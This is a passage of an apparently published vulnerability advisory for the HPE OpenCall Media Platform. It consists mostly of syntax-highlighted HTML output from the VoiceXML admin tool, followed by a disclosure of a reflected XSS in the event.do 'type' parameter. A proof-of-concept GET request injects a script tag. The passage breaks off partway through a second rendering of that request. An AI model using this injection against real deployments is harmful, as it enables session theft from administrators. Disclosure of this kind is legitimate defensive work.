id=\"crayon-58fe79da835f5733313357-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_40_420_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150907<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">15.254<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00.501<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-188\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-189\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-190\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-191\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-192\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-193\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-194\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">tr <\/span><span class=\"crayon-v\">bgcolor<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eeeeee&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-195\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-196\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">tb0ocmp0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-197\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-198\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&amp;contenttype=text\/html&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-199\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-200\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;_new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-201\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;call.do?action=monitor&amp;cid=vxi_dialog_0_32_634_0&amp;node=tb0ocmp0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Monitor<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-202\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-203\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;service.do?action=update&amp;id=o2_ivr_3xxx&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">o2_ivr_3xxx<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-204\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-205\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">sip<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-v\">unavailable<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">unknown<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">invalid<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-206\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1540003000009388<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-207\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">ERROR <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-208\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">WARN <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-209\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">callid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">vxi_dialog_0_32_634_0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">vxml_exception <\/span><span class=\"crayon-v\">target<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;new&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-210\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">150907<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">13.901<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">45.194<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-211\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-212\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-213\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-214\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-215\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-216\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-217\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-218\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-219\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">table<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-220\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-221\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-222\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-223\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TABLE<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da835f5733313357-224\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BODY<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da835f5733313357-225\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0840 seconds] -->  <\/p>\n<p><strong>VoiceXML Administration Tool &#8211; <em>event.do<\/em> function<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>event.do<\/em> function parameters input. An attacker can inject malicious javascript to trigger the Reflected Cross-Site Scripting (XSS).<\/p>\n<p>The vulnerable URL: <em>\/om\/event.do?action=list&amp;type=<strong>XSS_HERE<\/strong><\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83604566033155\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/om\/event.do?action=list&amp;type=Active637a3&lt;script&gt;alert(1)&lt;%2fscript&gt;c7e9f HTTP\/1.1  Accept: text\/html, application\/xhtml+xml, *\/*  Referer: https:\/\/172.27.116.32:5443\/om\/call.do?action=trace_calls&amp;type=trace_calls  Accept-Language: en-GB  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko  Accept-Encoding: gzip, deflate  Host: 172.27.116.32:5443  DNT: 1  Connection: Keep-Alive  Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83604566033155-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83604566033155-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83604566033155-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83604566033155-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83604566033155-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83604566033155-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83604566033155-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83604566033155-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83604566033155-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83604566033155-10\">10<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83604566033155-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">om<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">Active637a3<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2fscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">c7e9f <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83604566033155-2\"><span 